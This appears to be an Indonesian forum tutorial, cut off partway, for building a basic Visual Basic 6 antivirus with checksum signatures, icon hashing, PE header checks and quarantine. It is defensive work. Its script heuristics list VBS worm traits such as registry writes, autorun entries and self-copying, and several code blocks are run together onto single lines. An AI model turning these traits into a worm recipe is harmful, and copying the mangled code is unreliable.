Public Declare Function FindNextFile Lib "kernel32" Alias "FindNextFileA" (ByVal hFindFile As Long, lpFindFileData As WIN32_FIND_DATA) As Long
Public Declare Function FindClose Lib "kernel32" (ByVal hFindFile As Long) As Long
Public Declare Function PathIsDirectory Lib "shlwapi.dll" Alias "PathIsDirectoryA" (ByVal pszPath As String) As Long
Public Declare Function CopyFile Lib "kernel32.dll" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long
Public Declare Function MoveFile Lib "kernel32.dll" Alias "MoveFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String) As Long
Public Declare Function DeleteFile Lib "kernel32" Alias "DeleteFileA" (ByVal lpFileName As String) As Long
Public Declare Function PathFileExists Lib "shlwapi.dll" Alias "PathFileExistsA" (ByVal pszPath As String) As Long
Public Declare Function GetSystemDirectory Lib "kernel32.dll" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function GetWindowsDirectory Lib "kernel32.dll" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function SHGetPathFromIDList Lib "shell32.dll" Alias "SHGetPathFromIDListA" (ByVal pidl As Long, ByVal pszPath As String) As Long
Public Declare Function SHBrowseForFolder Lib "shell32.dll" Alias "SHBrowseForFolderA" (lpBrowseInfo As BROWSEINFO) As Long
Private Declare Function RealizePalette Lib "gdi32" (ByVal hDC As Long) As Long
Public Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, lpSecurityAttributes As Any, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Public Declare Function GetFileSize Lib "kernel32" (ByVal hFile As Long, lpFileSizeHigh As Long) As Long
Public Declare Function VirtualAlloc Lib "kernel32" (lpAddress As Any, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Public Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, lpOverlapped As Any) As Long
Public Declare Function WriteFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, lpOverlapped As Any) As Long
Public Declare Function SetFilePointer Lib "kernel32" (ByVal hFile As Long, ByVal lDistanceToMove As Long, lpDistanceToMoveHigh As Long, ByVal dwMoveMethod As Long) As Long
Public Declare Function SetEndOfFile Lib "kernel32" (ByVal hFile As Long) As Long

Public Const GENERIC_READ = &H80000000
Public Const GENERIC_WRITE = &H40000000
Public Const FILE_SHARE_READ = &H1
Public Const OPEN_EXISTING = 3
Public Const FILE_ATTRIBUTE_NORMAL = &H80
Public Const INVALID_HANDLE_VALUE = -1
Public Const FILE_END = 2
Public Const FILE_BEGIN = 0
Public Const FILE_CURRENT = 1
Public Const LWA_COLORKEY = &H1
Public Const GWL_EXSTYLE = (-20)
Public Const WS_EX_LAYERED = &H80000
Public Const MAX_PATH = 260
Public Const SW_SHOWNORMAL = 1

Public Type FileTime
dwLowDateTime As Long
dwHighDateTime As Long
End Type

Public Type WIN32_FIND_DATA
dwFileAttributes As Long
ftCreationTime As FileTime
ftLastAccessTime As FileTime
ftLastWriteTime As FileTime
nFileSizeHigh As Long
nFileSizeLow As Long
dwReserved0 As Long
dwReserved1 As Long
cFileName As String * MAX_PATH
cAlternate As String * 14
End Type

Type BROWSEINFO
hOwner As Long
pidlRoot As Long
pszDisplayName As String
lpszTitle As String
ulFlags As Long
lpfn As Long
lParam As Long
iImage As Long
End Type

'untuk browse folder
Public Function BrowseFolder(ByVal aTitle As String, ByVal aForm As Form) As String
Dim bInfo As BROWSEINFO
Dim rtn&, pidl&, path$, pos%
Dim BrowsePath As String
bInfo.hOwner = aForm.hWnd
bInfo.lpszTitle = aTitle
bInfo.ulFlags = &H1
pidl& = SHBrowseForFolder(bInfo)
path = Space(512)
t = SHGetPathFromIDList(ByVal pidl&, ByVal path)
pos% = InStr(path$, Chr$(0))
BrowseFolder = Left(path$, pos - 1)
If Right$(Browse, 1) = "\" Then
BrowseFolder = BrowseFolder
Else
BrowseFolder = BrowseFolder + "\"
End If
If Right(BrowseFolder, 2) = "\\" Then BrowseFolder = Left(BrowseFolder, Len(BrowseFolder) - 1)
If BrowseFolder = "\" Then BrowseFolder = ""
End Function

Public Function StripNulls(ByVal OriginalStr As String) As String
If (InStr(OriginalStr, Chr$(0)) > 0) Then
OriginalStr = Left$(OriginalStr, InStr(OriginalStr, Chr(0)) - 1)
End If
StripNulls = OriginalStr
End Function

'fungsi untuk menentukan file script atau bukan
Public Function IsScript(Filename As String) As Boolean
IsScript = False
ext = Split("|vbs|vbe", "|")
For i = 1 To UBound(ext)
If LCase(Right(Filename, 3)) = LCase(ext(i)) Then IsScript = True
Next
End Function

Code di atas adalah Fungsi API yang di butuhkan untuk antivirus

Buat 1 module dengan nama modChecksum
masukan code di bawah ini.

Spoiler
'Code:
Public Function GetChecksum(FilePath As String) As String
Dim CheckSum(1 To 2) As String
CheckSum(1) = CalcBinary(FilePath, 499, 4500)
CheckSum(2) = CalcBinary(FilePath, 499, 4000)
GetChecksum = CheckSum(1) & CheckSum(2)
End Function
Public Function CalcBinary(ByVal lpFileName As String, ByVal lpByteCount As Long, Optional ByVal StartByte As Long = 0) As String
On Error GoTo err
Dim Bin() As Byte
Dim ByteSum As Long
Dim i As Long
ReDim Bin(lpByteCount) As Byte
Open lpFileName For Binary As #1
If StartByte = 0 Then
Get #1, , Bin
Else
Get #1, StartByte, Bin
End If
Close #1
For i = 0 To lpByteCount
ByteSum = ByteSum + Bin(i) ^ 2
Next i
CalcBinary = Hex$(ByteSum)
Exit Function
err:
CalcBinary = "00"
End Function

potongan code di atas di gunakan untuk meng kalkulasi checksum

buat 1 module lagi dengan nama modDatabase
lalu tambahkan code di bawah ini.

Spoiler
'Code:
Public VirusDB(5), IconDB(48), Bahaya(5) As String
Public Sub BuildDatabase()
Call Checksum_DB
Call IconCompare_DB
Call Script_DB
End Sub
Private Sub Checksum_DB()
VirusDB(1) = "Alman.A|8911D290F723"
VirusDB(2) = "Malingsi.A|A6292EA60230"
VirusDB(3) = "Conficker.A|9EC112ABB2F3"
VirusDB(4) = "N4B3.A|B5CCD36CDB98"
VirusDB(5) = "N4B3.B|A1FE6D6DBE07"
End Sub
Public Sub IconCompare_DB()
On Error Resume Next
IconDB(1) = "20938B2"
IconDB(2) = "19F4ED6"
IconDB(3) = "133BE0B"
IconDB(4) = "18EDEAE"
IconDB(5) = "1EF89C2"
IconDB(6) = "1C915FF"
IconDB(7) = "24563C4"
IconDB(8) = "1B2DB74"
IconDB(9) = "208EA72"
IconDB(10) = "22A064D"
IconDB(11) = "19B64EE"
IconDB(12) = "1D4B7E1"
IconDB(13) = "2087762"
IconDB(14) = "29C7258"
IconDB(15) = "1B18705"
IconDB(16) = "1B5FCAB"
IconDB(17) = "126D4CF"
IconDB(18) = "1C58E5C"
IconDB(19) = "15D7730"
IconDB(20) = "1FB82B7"
IconDB(21) = "112763E"
IconDB(22) = "2165AF9"
IconDB(23) = "25F46BE"
IconDB(24) = "206556B"
IconDB(25) = "22A8D69"
IconDB(26) = "19237F8"
IconDB(27) = "15022B4"
IconDB(28) = "1D8B4EB"
IconDB(29) = "1DBC1EA"
IconDB(30) = "2333F5D"
IconDB(31) = "1F37C2F"
IconDB(32) = "1C9CCA4"
IconDB(33) = "1DFDFB4"
IconDB(34) = "1C1283E"
IconDB(35) = "1F6598C"
IconDB(36) = "27F4C1A"
IconDB(37) = "22F92E0"
IconDB(38) = "191DBDC"
IconDB(39) = "27BFE4A"
IconDB(40) = "20E0907"
IconDB(46) = "2FA4C88"
IconDB(47) = "25AA630"
IconDB(48) = "1DE28E2"
End Sub
Public Sub Script_DB()
On Error Resume Next
Bahaya(1) = "Scripting.FileSystemObject|Wscript.ScriptFullName|WScript.Shell|.regwrite|.copy"
Bahaya(2) = "Wscript.ScriptFullName|createobject|strreverse|.regwrite"
Bahaya(3) = "createobject|Wscript.ScriptFullName|.regwrite|[autorun]"
Bahaya(4) = "createobject|Wscript.ScriptFullName|specialfolder|.regwrite"
Bahaya(5) = "chr(asc(mid(|createobject|Wscript.ScriptFullName|.GetFolder|.RegWrite"
End Sub

potongan code di atas adalah database pada antivirusnya

buat lagi 1 buah module dengan nama modQuar
masukan code yang ada di bawah ini
Spoiler

Code:
Option Explicit
Public Function EncodeFile(SourceFile As String, DestFile As String)
Dim ByteArray() As Byte, Filenr As Integer
Filenr = FreeFile
Open SourceFile For Binary As #Filenr
ReDim ByteArray(0 To LOF(Filenr) - 1)
Get #Filenr, , ByteArray()
Close #Filenr
Call Coder(ByteArray())
If (PathFileExists(DestFile)) <> 0 Then DeleteFile DestFile
Open DestFile For Binary As #Filenr
Put #Filenr, , ByteArray()
Close #Filenr
End Function
Public Function DecodeFile(SourceFile As String, DestFile As String)
Dim ByteArray() As Byte, Filenr As Integer
Filenr = FreeFile
Open SourceFile For Binary As #Filenr
ReDim ByteArray(0 To LOF(Filenr) - 1)
Get #Filenr, , ByteArray()
Close #Filenr
Call DeCoder(ByteArray())
If (PathFileExists(DestFile)) <> 0 Then DeleteFile DestFile
Open DestFile For Binary As #Filenr
Put #Filenr, , ByteArray()
Close #Filenr
End Function
Private Sub Coder(ByteArray() As Byte)
Dim x As Long
Dim Value As Integer
Value = 0
For x = 0 To UBound(ByteArray)
Value = Value + ByteArray(x)
If Value > 255 Then Value = Value - 256
ByteArray(x) = Value
Next
End Sub
Private Sub DeCoder(ByteArray() As Byte)
Dim x As Long
Dim Value As Integer
Dim newValue As Integer
newValue = 0
For x = 0 To UBound(ByteArray)
Value = newValue
newValue = ByteArray(x)
Value = ByteArray(x) - Value
If Value < 0 Then Value = Value + 256 ByteArray(x) = Value Next End Sub
Code di atas adalah code untuk enkripsi/dekripsi pada virus yang akan di karantina

Buat lagi 1 module dengan nama modHeuristic
lalu masukan code di bawah ini
Spoiler
'Code:
Private Declare Function ExtractIconEx Lib "shell32.dll" Alias "ExtractIconExA" (ByVal lpszFile As String, ByVal nIconIndex As Long, ByRef phiconLarge As Long, ByRef phiconSmall As Long, ByVal nIcons As Long) As Long
Private Declare Function DestroyIcon Lib "user32.dll" (ByVal hIcon As Long) As Long
Private Declare Function DrawIconEx Lib "user32" (ByVal hDC As Long, ByVal xLeft As Long, ByVal yTop As Long, ByVal hIcon As Long, ByVal cxWidth As Long, ByVal cyWidth As Long, ByVal istepIfAniCur As Long, ByVal hbrFlickerFreeDraw As Long, ByVal diFlags As Long) As Boolean
Private Declare Function ExtractIcon Lib "shell32.dll" Alias "ExtractIconA" (ByVal hInst As Long, ByVal lpszExefileName As String, ByVal nIconIndex As Long) As Long
Private Const DI_MASK = &H1
Private Const DI_IMAGE = &H2
Private Const DI_NORMAL = &H3
Private Const DI_COMPAT = &H4
Private Const DI_DEFAULTSIZE = &H8
Private Const SHGFI_DISPLAYNAME = &H200
Private Const SHGFI_EXETYPE = &H2000
Private Const SHGFI_SYSICONINDEX = &H4000
Private Const SHGFI_LARGEICON = &H0
Private Const SHGFI_SMALLICON = &H1
Private Const ILD_TRANSPARENT = &H1
Private Const SHGFI_SHELLICONSIZE = &H4
Private Const SHGFI_TYPENAME = &H400
Private Const BASIC_SHGFI_FLAGS = SHGFI_TYPENAME Or SHGFI_SHELLICONSIZE Or SHGFI_SYSICONINDEX Or SHGFI_DISPLAYNAME Or SHGFI_EXETYPE
Private SIconInfo As SHFILEINFO
Private SectionHeaders() As IMAGE_SECTION_HEADER
Dim i As Integer
Dim j As Integer
Public Function CekHeuristic(Filename As String)
CekHeuristic = ""
On Error GoTo hError
Dim hFile As Long, bRW As Long
Dim DOSheader As IMAGE_DOS_HEADER
Dim NTHeaders As IMAGE_NT_HEADERS
Dim Filedata As String
DOS_HEADER_INFO = ""
NT_HEADERS_INFO = ""
hFile = CreateFile(Filename, ByVal (GENERIC_READ Or GENERIC_WRITE), FILE_SHARE_READ, ByVal 0&, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, ByVal 0)
ReadFile hFile, DOSheader, Len(DOSheader), bRW, ByVal 0&
SetFilePointer hFile, DOSheader.e_lfanew, 0, 0
ReadFile hFile, NTHeaders, Len(NTHeaders), bRW, ByVal 0&
If NTHeaders.Signature <> IMAGE_NT_SIGNATURE Then
If IsScript(Filename) = True Then
Open Filename For Binary As #1
Filedata = Space$(LOF(1))
Get #1, , Filedata
Close #1
CekHeuristic = CekHeur(Filedata)
End If
Exit Function
End If
CekHeuristic = CekIconBinary(Filename)
hError:
End Function
Private Function CekHeur(Data As String)
Dim hsl, asl As Integer
strasli = LCase(Replace(Data, vbNewLine, "$"))
For i = 1 To UBound(Bahaya)
hsl = 0
strData = Split(Bahaya(i), "|")
asl = 0
For k = 0 To UBound(strData)
xxx = LCase(strData(k))
If InStr(strasli, xxx) > 0 Then hsl = hsl + 1
asl = asl + 1
Next
If hsl = asl Then
CekHeur = "Malicious-Script"
Exit Function
End If
Next
CekHeur = ""
End Function
Private Function CekIconBinary(PathFile As String)
Dim q As Integer
Dim IconIDNow As String
CekIconBinary = ""
IconIDNow = CalcIcon(PathFile)
If IconIDNow = "" Then Exit Function
For q = 1 To UBound(IconDB)
If IconDB(q) = IconIDNow Then
CekIconBinary = "Malicious-Icon"
Exit Function
End If
Next q
End Function
Private Function CalcBinary(ByVal lpFileName As String, ByVal lpByteCount As Long, Optional ByVal StartByte As Long = 0) As String
Dim Bin() As Byte
Dim ByteSum As Long
Dim i As Long
ReDim Bin(lpByteCount) As Byte
Open lpFileName For Binary As #1
If StartByte = 0 Then
Get #1, , Bin
Else
Get #1, StartByte, Bin
End If
Close #1
For i = 0 To lpByteCount
ByteSum = ByteSum + Bin(i) ^ 2
Next i
CalcBinary = Hex$(ByteSum)
End Function
Private Function CalcIcon(ByVal lpFileName As String) As String
Dim PicPath As String
Dim ByteSum As String
Dim IconExist As Long
Dim hIcon As Long
IconExist = ExtractIconEx(lpFileName, 0, ByVal 0&, hIcon, 1)
If IconExist <= 0 Then IconExist = ExtractIconEx(lpFileName, 0, hIcon, ByVal 0&, 1) If IconExist <= 0 Then Exit Function End If frmUtama.sIcon.BackColor = vbWhite DrawIconEx frmUtama.sIcon.hDC, 0, 0, hIcon, 0, 0, 0, 0, DI_NORMAL DestroyIcon hIcon PicPath = Environ$("windir") & "\tmp.tmp" SavePicture frmUtama.sIcon.Image, PicPath ByteSum = CalcBinary(PicPath, FileLen(PicPath)) DeleteFile PicPath CalcIcon = ByteSum End Function
Fungsi di atas adalah fungsi untuk mengecek suatu file dengan metode heuristic icon + heuristic untuk virus VBS

Buat 1 module dengan nama modIconCompare
lalu masukan code di bawah ini
Spoiler
'Code:
Option Explicit
Private Const SHGFI_DISPLAYNAME = &H200, SHGFI_EXETYPE = &H2000, SHGFI_SYSICONINDEX = &H4000, SHGFI_LARGEICON = &H0, SHGFI_SMALLICON = &H1, SHGFI_SHELLICONSIZE = &H4, SHGFI_TYPENAME = &H400, ILD_TRANSPARENT = &H1, BASIC_SHGFI_FLAGS = SHGFI_TYPENAME Or SHGFI_SHELLICONSIZE Or SHGFI_SYSICONINDEX Or SHGFI_DISPLAYNAME Or SHGFI_EXETYPE
Public Type SHFILEINFO
hIcon As Long: iIcon As Long: dwAttributes As Long: szDisplayName As String * MAX_PATH: szTypeName As String * 80
End Type
Private Declare Function SHGetFileInfo Lib "shell32.dll" Alias "SHGetFileInfoA" (ByVal pszPath As String, ByVal dwFileAttributes As Long, psfi As SHFILEINFO, ByVal cbSizeFileInfo As Long, ByVal uFlags As Long) As Long
Private Declare Function ImageList_Draw Lib "comctl32.dll" (ByVal himl As Long, ByVal i As Long, ByVal hdcDest As Long, ByVal x As Long, ByVal y As Long, ByVal flags As Long) As Long
Private shinfo As SHFILEINFO, sshinfo As SHFILEINFO
Private Declare Function DrawIconEx Lib "user32.dll" (ByVal hDC As Long, ByVal xLeft As Long, ByVal yTop As Long, ByVal hIcon As Long, ByVal cxWidth As Long, ByVal cyWidth As Long, ByVal istepIfAniCur As Long, ByVal hbrFlickerFreeDraw As Long, ByVal diFlags As Long) As Long
Private SIconInfo As SHFILEINFO

Public Enum IconRetrieve
ricnLarge = 32
ricnSmall = 16
End Enum

Public Sub RetrieveIcon(fName As String, DC As PictureBox, icnSize As IconRetrieve)
Dim hImgSmall, hImgLarge As Long
Debug.Print fName
Select Case icnSize
Case ricnSmall
hImgSmall = SHGetFileInfo(fName$, 0&, shinfo, Len(shinfo), BASIC_SHGFI_FLAGS Or SHGFI_SMALLICON)
Call ImageList_Draw(hImgSmall, shinfo.iIcon, DC.hDC, 0, 0, ILD_TRANSPARENT)
Case ricnLarge
hImgLarge& = SHGetFileInfo(fName$, 0&, shinfo, Len(shinfo), BASIC_SHGFI_FLAGS Or SHGFI_LARGEICON)
Call ImageList_Draw(hImgLarge, shinfo.iIcon, DC.hDC, 0, 0, ILD_TRANSPARENT)
End Select
End Sub
Public Function ExtractIcon(Filename As String, AddtoImageList As ImageList, PictureBox As PictureBox, PixelsXY As IconRetrieve, iKey As String) As Long
Dim SmallIcon As Long
Dim NewImage As ListImage
Dim IconIndex As Integer
On Error GoTo Load_New_Icon
If iKey <> "Application" And iKey <> "Shortcut" Then
ExtractIcon = AddtoImageList.ListImages(iKey).Index
Exit Function
End If
Load_New_Icon:
On Error GoTo Reset_Key
RetrieveIcon Filename, PictureBox, PixelsXY
IconIndex = AddtoImageList.ListImages.Count + 1
Set NewImage = AddtoImageList.ListImages.Add(IconIndex, iKey, PictureBox.Image)
ExtractIcon = IconIndex
Exit Function
Reset_Key:
iKey = ""
Resume
End Function
Public Sub GetLargeIcon(icPath$, pDisp As PictureBox)
Dim hImgLrg&: hImgLrg = SHGetFileInfo(icPath$, 0&, SIconInfo, Len(SIconInfo), BASIC_SHGFI_FLAGS Or SHGFI_LARGEICON)
ImageList_Draw hImgLrg, SIconInfo.iIcon, pDisp.hDC, 0, 0, ILD_TRANSPARENT
End Sub

kode di atas di butuhkan untuk metode heuristic icon pada antivirus

Buat 1 module dengan nama modLV
lalu masukan code di bawah ini
Spoiler
'Code:
Public Function GetSelected(TheLV As ListView)
Dim Sel As String
For i = 1 To TheLV.ListItems.Count
If TheLV.ListItems.Item(i).Checked = True Then
Sel = Sel & "|" & TheLV.ListItems.Item(i).SubItems(1)
End If
Next
GetSelected = Sel
End Function

Public Function SelectedAll(TheLV As ListView)
For i = 1 To TheLV.ListItems.Count
TheLV.ListItems.Item(i).Checked = True
Next
End Function

Public Function SelectedNone(TheLV As ListView)
For i = 1 To TheLV.ListItems.Count
TheLV.ListItems.Item(i).Checked = False
Next
End Function

Public Function GetIndex(TheLV As ListView, Data As String) As Integer
For i = 1 To TheLV.ListItems.Count
If TheLV.ListItems.Item(i).SubItems(1) = Data Then
GetIndex = i
End If
Next
End Function

Public Function UnSelect(TheLV As ListView, Data As String)
For i = 1 To TheLV.ListItems.Count
If TheLV.ListItems.Item(i).SubItems(3) = Data Then
TheLV.ListItems.Item(i).Checked = False
End If
Next
End Function

Public Function AddDetect(TheLV As ListView, FilePath As String, VirData As String)
With TheLV
If Left(VirData, 9) <> "Malicious" Then
Set lvItm = .ListItems.Add(, , Split(VirData, "|")(0), , frmUtama.ImgSmall.ListImages(1).Index)
lvItm.SubItems(1) = FilePath
lvItm.SubItems(2) = Split(VirData, "|")(1)
lvItm.SubItems(3) = "Virus File"
Else
Set lvItm = .ListItems.Add(, , VirData, , frmUtama.ImgSmall.ListImages(1).Index)
lvItm.SubItems(1) = FilePath
lvItm.SubItems(2) = GetChecksum(FilePath)
lvItm.SubItems(3) = "Virus File"
End If
End With
End Function

Code di atas berguna untuk dengatur Listview pada saat virus terdeteksi

Buat 1 module dengan nama modPE
lalu masukan code di bawah ini
Spoiler
'Code:
Public Type IMAGE_DOS_HEADER
e_magic As Integer
e_cblp As Integer
e_cp As Integer
e_crlc As Integer
e_cparhdr As Integer
e_minalloc As Integer
e_maxalloc As Integer
e_ss As Integer
e_sp As Integer
e_csum As Integer
e_ip As Integer
e_cs As Integer
e_lfarlc As Integer
e_ovno As Integer
e_res(1 To 4) As Integer
e_oemid As Integer
e_oeminfo As Integer
e_res2(1 To 10) As Integer
e_lfanew As Long
End Type

Public Type IMAGE_SECTION_HEADER
nameSec As String * 6
PhisicalAddress As Integer

VirtualSize As Long
VirtualAddress As Long
SizeOfRawData As Long
PointerToRawData As Long
PointerToRelocations As Long
PointerToLinenumbers As Long
NumberOfRelocations As Integer
NumberOfLinenumbers As Integer
Characteristics As Long

End Type

Public Type IMAGE_DATA_DIRECTORY
VirtualAddress As Long
size As Long
End Type

Public Type IMAGE_OPTIONAL_HEADER
Magic As Integer
MajorLinkerVersion As Byte
MinorLinkerVersion As Byte
SizeOfCode As Long
SizeOfInitializedData As Long
SizeOfUninitializedData As Long
AddressOfEntryPoint As Long
BaseOfCode As Long
BaseOfData As Long
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOperatingSystemVersion As Integer
MinorOperatingSystemVersion As Integer
MajorImageVersion As Integer
MinorImageVersion As Integer
MajorSubsystemVersion As Integer
MinorSubsystemVersion As Integer
Win32VersionValue As Long
SizeOfImage As Long
SizeOfHeaders As Long
CheckSum As Long
Subsystem As Integer
DllCharacteristics As Integer
SizeOfStackReserve As Long
SizeOfStackCommit As Long
SizeOfHeapReserve As Long
SizeOfHeapCommit As Long
LoaderFlags As Long
NumberOfRvaAndSizes As Long
DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
End Type

Public Type IMAGE_FILE_HEADER
Machine As Integer
NumberOfSections As Integer
TimeDateStamp As Long
PointerToSymbolTable As Long
NumberOfSymbols As Long
SizeOfOptionalHeader As Integer
Characteristics As Integer
End Type

Public Type IMAGE_NT_HEADERS
Signature As Long
FileHeader As IMAGE_FILE_HEADER
OptionalHeader As IMAGE_OPTIONAL_HEADER
End Type

Public Type IMAGE_EXPORT_DIRECTORY
Characteristics As Long
TimeDateStamp As Long
MajorVersion As Integer
MinorVersion As Integer
Name As Long
Base As Long
NumberOfFunctions As Long
NumberOfNames As Long
AddressOfFunctions As Long
AddressOfNames As Long
AddressOfNameOrdinals As Long
End Type

Public Type IMAGE_IMPORT_DESCRIPTOR
OriginalFirstThunk As Long
TimeDateStamp As Long
ForwarderChain As Long
Name As Long
FirstThunk As Long
End Type

Public Type IMAGE_IMPORT_BY_NAME
Hint As Integer
Name As String * 255
End Type

Public Const IMAGE_SIZEOF_SECTION_HEADER = 40
Public Const IMAGE_DOS_SIGNATURE = &H5A4D
Public Const IMAGE_NT_SIGNATURE = &H4550
Public Const IMAGE_ORDINAL_FLAG = &H80000000

Public Enum SECTION_CHARACTERISTICS
IMAGE_SCN_LNK_NRELOC_OVFL = &H1000000 'Section contains extended relocations.
IMAGE_SCN_MEM_DISCARDABLE = &H2000000 'Section can be discarded.
IMAGE_SCN_MEM_NOT_CACHED = &H4000000 'Section is not cachable.
IMAGE_SCN_MEM_NOT_PAGED = &H8000000 'Section is not pageable.
IMAGE_SCN_MEM_SHARED = &H10000000 'Section is shareable.
IMAGE_SCN_MEM_EXECUTE = &H20000000 'Section is executable.
IMAGE_SCN_MEM_READ = &H40000000 'Section is readable.
IMAGE_SCN_MEM_WRITE = &H80000000 'Section is writeable.
End Enum

Public Enum IMAGE_DIRECTORY
IMAGE_DIRECTORY_ENTRY_EXPORT = 0 ' Export Directory
IMAGE_DIRECTORY_ENTRY_IMPORT = 1 ' Import Directory
IMAGE_DIRECTORY_ENTRY_RESOURCE = 2 ' Resource Directory
IMAGE_DIRECTORY_ENTRY_EXCEPTION = 3 ' Exception Directory
IMAGE_DIRECTORY_ENTRY_SECURITY = 4 ' Security Directory
IMAGE_DIRECTORY_ENTRY_BASERELOC = 5 ' Base Relocation Table
IMAGE_DIRECTORY_ENTRY_DEBUG = 6 ' Debug Directory
IMAGE_DIRECTORY_ENTRY_ARCHITECTURE = 7 ' Architecture Specific Data
IMAGE_DIRECTORY_ENTRY_GLOBALPTR = 8 ' RVA of GP
IMAGE_DIRECTORY_ENTRY_TLS = 9 ' TLS Directory
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG = 10 ' Load Configuration Directory
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT = 11 ' Bound Import Directory in headers
IMAGE_DIRECTORY_ENTRY_IAT = 12 ' Import Address Table
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT = 13 ' Delay Load Import Descriptors
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14 ' COM Runtime descriptor
End Enum

code di atas berfungsi untuk pengecekan PE HEADER

buat 1 module dengan nama modScanning
lalu tambahkan code di bawah ini
Spoiler
'Code:
Public jumlahDir As Long, jumlahFile As Long, jumlahVirus As Long
Public StopScan As Boolean

Public Function CekVirus(FilePath As String) As String
CekVirus = ""
For i = 1 To UBound(VirusDB)
If GetChecksum(FilePath) = Split(VirusDB(i), "|")(1) Then
CekVirus = VirusDB(i)
Exit Function
End If
Next
If FileLen(FilePath) / 1024 <= 512 Then CekVirus = CekHeuristic(FilePath) End If End Function Public Sub FindFilesEx(ByVal lpFolderName As String, ByVal SubDirs As Boolean) Dim i As Long Dim hSearch As Long, WFD As WIN32_FIND_DATA Dim Result As Long, CurItem As String Dim tempDir() As String, dirCount As Long Dim RealPath As String, GetViri As String GetViri = "" dirCount = -1 ScanInfo = "Scan File" If Right$(lpFolderName, 1) = "\" Then RealPath = lpFolderName Else RealPath = lpFolderName & "\" End If hSearch = FindFirstFile(RealPath & "*", WFD) If Not hSearch = INVALID_HANDLE_VALUE Then Result = True Do While Result DoEvents If StopScan = True Then Exit Do CurItem = StripNulls(WFD.cFileName) If Not CurItem = "." And Not CurItem = ".." Then If PathIsDirectory(RealPath & CurItem) <> 0 Then
jumlahDir = jumlahDir + 1
frmUtama.lblDirScan.Caption = jumlahDir
If SubDirs = True Then
dirCount = dirCount + 1
ReDim Preserve tempDir(dirCount) As String
tempDir(dirCount) = RealPath & CurItem
End If
Else
jumlahFile = jumlahFile + 1
frmUtama.lblFileScan.Caption = jumlahFile
frmUtama.txtFileScan.Text = RealPath & CurItem
frmUtama.txtFileScan.SelStart = Len(frmUtama.txtFileScan.Text)
If WFD.nFileSizeLow > 5120 Or WFD.nFileSizeHigh > 5120 Then
GetViri = CekVirus(RealPath & CurItem)
If GetViri <> "" Then
AddDetect frmUtama.lvScan, RealPath & CurItem, GetViri
jumlahVirus = jumlahVirus + 1
frmUtama.lblFileDet.Caption = jumlahVirus
End If
End If
End If
End If
Result = FindNextFile(hSearch, WFD)
Loop
FindClose hSearch

If SubDirs = True Then
If dirCount <> -1 Then
For i = 0 To dirCount
FindFilesEx tempDir(i), True
Next i
End If
End If
End If
End Sub

Code di atas adalah code untuk scan file & folder pada antivirus

buat 1 module dengan nama modEtc
masukan code di bawah ini
Spoiler
'Code:
Public Function Action(Data As String, TheLV As ListView, Mode As String)
Dim Filedata() As String
Dim fName, tmp, Status As String
Dim y As Integer
Filedata = Split(Data, "|")
For i = 1 To UBound(Filedata)
a = a + 1
If Mode = "Q" Then
fName = GetFileName(Filedata(i))
EncodeFile Filedata(i), AppPath & "Quarantine\" & Left$(fName, Len(fName) - Len(GetExt(Filedata(i)))) & ".avq"
AddQList TheLV, Filedata(i), Left$(fName, Len(fName) - Len(GetExt(Filedata(i)))) & ".avq"
DeleteFile Filedata(i)
Status = "Di Karantina"
ElseIf Mode = "D" Then
DeleteFile Filedata(i)
Status = "Di Hapus"
End If
y = GetIndex(TheLV, Filedata(i))
With TheLV.ListItems.Item(y)
.SubItems(3) = Status
.Checked = False
.SmallIcon = frmUtama.ImgSmall.ListImages(2).Index
End With
Next
Action = a
End Function

Public Function AddQList(TheLV As ListView, FilePath As String, Source As String)
Dim Dat As String
Dat = AppPath & "Quarantine\HN.dat"
If PathFileExists(Dat) <> 0 Then
Open Dat For Input As #1
Input #1, isi
Close #1
DeleteFile Dat
Else
isi = ""
End If
namavir = TheLV.ListItems(GetIndex(TheLV, FilePath))
If InStrRev(isi, Source, , vbTextCompare) = 0 Then
Open Dat For Output As #2
Print #2, isi & "|" & namavir & "?" & FilePath & "?" & Source
Close #2
Else
Open Dat For Output As #3
Print #3, isi
Close #3
End If
End Function

Public Function GetFileName(PathFile As String) As String
Dim i As Long
Dim DirString As Long
For i = 1 To Len(PathFile)
If Mid$(PathFile, i, 1) = "\" Then DirString = i
Next i
GetFileName = Right$(PathFile, Len(PathFile) - DirString)
End Function

Public Function GetExt(ByVal lpFileName As String)
Dim sTemp As String
Dim i As Long
sTemp = GetFileName(lpFileName)
If InStr(lpFileName, ".") Then
For i = 0 To Len(sTemp) - 1
If Mid$(sTemp, Len(sTemp) - i, 1) = "." Then
GetExt = Mid$(sTemp, Len(sTemp) - i, i)
Exit Function
End If
Next i
End If
End Function

Code di atas adalah kumpulan fungsi etc untuk scanning,karantina,delete

Ini adalah tampilan antivirus setelah di berikan module


sekarang tinggal cara membuat form quarantinenya,

caranya adalah sebagai berikut pada gambar berikut




setelah form baru sudah di buat,lalu rubah nama formnya menjadi frmQuarantine

Tambah 1 buah listview dengan nama lvQ
lalu setting listview tersebut sesuai dengan gambar di bawah ini,cara setting listview sudah tertera diatas.





Tambahkan 3 buah Command button dengan nama

cmdDelete
cmdRestore
cmdRestore(1)

Tambahkan code di bawah ini ke dalam Command [ cmdDelete ]

Spoiler
'Code:
